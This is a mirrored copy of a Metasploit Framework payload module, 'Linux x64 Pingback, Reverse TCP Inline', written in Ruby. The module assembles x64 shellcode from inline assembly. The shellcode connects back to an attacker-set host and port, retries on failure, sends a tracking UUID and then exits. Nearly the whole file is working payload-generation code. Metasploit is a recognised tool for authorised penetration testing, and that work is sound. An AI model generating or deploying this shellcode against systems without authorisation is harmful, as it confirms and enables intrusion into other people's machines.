Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 125

8


9
  include Msf::Payload::Linux::X64::Prepends

10
  include Msf::Payload::Single

11
  include Msf::Payload::Pingback

12
  include Msf::Payload::Pingback::Options

13


14
  def initialize(info = {})

15
    super(

16
      merge_info(

17
        info,

18
        'Name' => 'Linux x64 Pingback, Reverse TCP Inline',

19
        'Description' => 'Connect back to attacker and report UUID (Linux x64)',

20
        'Author' => [ 'bwatters-r7' ],

21
        'License' => MSF_LICENSE,

22
        'Platform' => 'linux',

23
        'Arch' => ARCH_X64,

24
        'Handler' => Msf::Handler::ReverseTcp,

25
        'Session' => Msf::Sessions::Pingback

26
      )

27
    )

28
  end

29


30
  def generate(_opts = {})

31
    # 22 -> "0x00,0x16"

32
    # 4444 -> "0x11,0x5c"

33
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first

34
    encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first

35
    encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })

36
    retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max

37


38
    self.pingback_uuid ||= generate_pingback_uuid

39
    uuid_as_db = '0x' + self.pingback_uuid.chars.each_slice(2).map(&:join).join(',0x')

40
    seconds = 5.0

41
    sleep_seconds = seconds.to_i

42
    sleep_nanoseconds = (seconds % 1 * 1_000_000_000).to_i

43


44
    asm = %^

45
        push   #{retry_count}        ; retry counter

46
        pop    r9

47
        push   rsi

48
        push   rax

49
        push   0x29

50
        pop    rax

51
        cdq

52
        push   0x2

53
        pop    rdi

54
        push   0x1

55
        pop    rsi

56
        syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)

57
        test   rax, rax

58
        js failed

59


60
        xchg   rdi, rax

61


62
      connect:

63
        mov    rcx, #{encoded_host_port}

64
        push   rcx

65
        mov    rsi, rsp

66
        push   0x10

67
        pop    rdx

68
        push   0x2a

69
        pop    rax

70
        syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)

71
        pop    rcx

72
        test   rax, rax

73
        jns    send_pingback

74


75
      handle_failure:

76
        dec    r9

77
        jz     failed

78
        push   rdi

79
        push   0x23

80
        pop    rax

81
        push   0x#{sleep_nanoseconds.to_s(16)}

82
        push   0x#{sleep_seconds.to_s(16)}

83
        mov    rdi, rsp

84
        xor    rsi, rsi

85
        syscall                      ; sys_nanosleep

86
        pop    rcx

87
        pop    rcx

88
        pop    rdi

89
        test   rax, rax

90
        jns    connect

91


92
      failed:

93
        push   0x3c

94
        pop    rax

95
        push   0x1

96
        pop    rdi

97
        syscall ; exit(1)

98


99
      send_pingback:

100
        push #{uuid_as_db.split(',').length} ; length of the PINGBACK UUID

101
        pop rdx

102
        call get_uuid_address         ; put uuid buffer on the stack

103
        db #{uuid_as_db}  ; PINGBACK_UUID

104


105
      get_uuid_address:

106
        pop rsi                       ; UUID address

107
        xor rax, rax

108
        inc rax

109
        syscall                      ; sys_write

110


111
      jmp failed

112
      ^

113
    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string

114
  end

115
end

116


117